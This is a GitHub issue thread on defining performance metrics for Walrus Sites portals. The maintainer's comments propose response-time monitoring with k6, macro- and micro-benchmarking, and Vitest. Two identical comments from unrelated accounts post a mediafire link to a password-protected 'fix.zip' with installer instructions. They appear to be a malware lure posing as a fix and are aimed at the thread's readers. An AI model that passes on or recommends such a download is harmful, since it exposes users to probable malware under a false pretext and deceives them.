### ISSUE TITLE
Define performance metrics - benchmarks

### ISSUE THREAD

**Issue by Tzal3x** [MystenLabs/walrus-sites#185]
### Description

Define and calculate the [performance metrics](https://developer.mozilla.org/en-US/docs/Web/Performance) for our portals.

We need to measure how fast a site is served so that we can use it as a baseline, and improve on it as time goes on. 

It's important to distinguish metrics which are affected by how a website is implemented and the ones affected by the portal logic (site::Resource resolution etc). 

### Component

portal

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tzal3x** [comment]
The part of which we should profile is the portal fetching the site::Resources from the aggregator. 

For starters, we could just monitor the average response times of the server portal given a constant `walrus.site` like the snake example, or the landing page. 

A tool to do this is [k6](https://k6.io/docs/examples/get-timings-for-an-http-metric/).

**Comment by Tzal3x** [comment]
There are two ways to do performance testing for our portals:
1. Macro-testing: compare the responses time of a walrus site served by the server-portal (running on vercel) and the same site served directly by vercel (without the involvement of walrus). The "health check" site could be part of this. 
2. Micro-testing: benchmarking specific functions such as `fetchPage`, `fetchResource`. A library to do this in typescript would be this one: https://github.com/microsoft/typescript-benchmarking. The benchmarking tests could also be included in CI/CD in order to monitor if changes we do hurt the performance of the portal.

**Comment by Tzal3x** [comment]
Vitest also supports benchmarking: https://vitest.dev/guide/features#benchmarking.

Since we already use vitest for our tests, it would be worth checking out.
